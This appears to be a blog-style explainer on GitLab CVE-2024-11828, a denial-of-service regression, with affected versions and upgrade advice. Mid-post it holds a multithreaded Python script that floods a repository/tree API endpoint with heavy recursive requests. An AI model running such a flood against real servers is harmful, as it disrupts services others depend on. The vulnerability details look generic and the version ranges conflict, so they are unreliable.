---
Introduction
A new denial of service (DoS) vulnerability, known as CVE-2024-11828, was discovered in GitLab Community Edition (CE) and Enterprise Edition (EE). The issue affects a huge number of installations and was caused by a regression - basically, a security hole re-opening after a previous fix. This post covers what CVE-2024-11828 is, how it works, details of the exploit, code snippets, and how you can protect your systems.
What is CVE-2024-11828?
CVE-2024-11828 is a vulnerability in the way GitLab handled certain API requests. By sending specifically crafted API calls, an attacker could cause the GitLab server to slow down or even crash, leading to a denial of service. It's an example of how a patch can sometimes be undone by later changes—this is called a regression.
Impacted Versions
- All GitLab CE/EE versions from 13.2.4 up to (but not including) 17.4.5
Details: How Does the Exploit Work?
The vulnerable GitLab instances have endpoints on their REST API that, when triggered with malformed or specifically crafted parameters, cause the server to perform heavy processing. Because of the regression, the checks that should have blocked these requests weren’t working as intended.
Typical Attack Flow
1. The attacker crafts a special API call with parameters designed to trigger expensive backend operations.
Sample Exploit Script
While it's unethical to attack real servers, here’s a simplified example (Python) for educational purposes showing how a DoS attack could be automated:
import requests
import threading
API_URL = "https://your-gitlab-instance.example.com/api/v4/projects/1/repository/tree";
HEADERS = {"PRIVATE-TOKEN": "YOUR_TOKEN_HERE"} # use a valid token or attack unauthenticated endpoints
def dos_attack():
# Normally, parameters like 'recursive=true' can increase load
params = {'recursive': 'true', 'per_page': 100000}
while True:
try:
r = requests.get(API_URL, headers=HEADERS, params=params, timeout=5)
print(f"Status: {r.status_code}")
except Exception as e:
print(f"Error: {e}")
threads = []
for _ in range(20): # 20 threads for massive effect
t = threading.Thread(target=dos_attack)
t.start()
threads.append(t)
> Warning: Don't use this code against any system you do not own or have explicit permission to test.
This script hammers a repository/tree endpoint, requesting a huge number of files recursively, which can tie up CPU and memory.
How Was This Vulnerability Introduced?
CVE-2024-11828 was a regression—a fix for a similar previous issue was undone by later coding changes. When fixing one bug, developers sometimes remove or alter code that protected another part of the system, accidentally reviving past issues.
How to Tell If You’re Affected
- If you’re running GitLab CE/EE between 13.2.4 and 17.4.4, or any 17.5 or 17.6 version before 17.5.3/17.6.1, you are likely vulnerable.
How to Patch
- Upgrade GitLab immediately to 17.4.5, 17.5.3, or 17.6.1 (whichever matches your version series).
See the official advisory for upgrade instructions:
- GitLab Security Release: 17.6.1, 17.5.3, and 17.4.5
- CVE-2024-11828 on GitLab
Conclusion
CVE-2024-11828 highlights the danger of security regressions, and why keeping software updated is so important. If you’re running GitLab, patch as soon as possible to avoid being open to simple but devasting API-based denial-of-service attacks. Stay ahead by subscribing to GitLab’s security advisories and routinely reviewing your access logs for unusual API activity.
If you want to read more, check out
- GitLab's Release Notes
- NIST NVD CVE-2024-11828 Entry
Timeline
Published on: 11/26/2024 19:15:22 UTC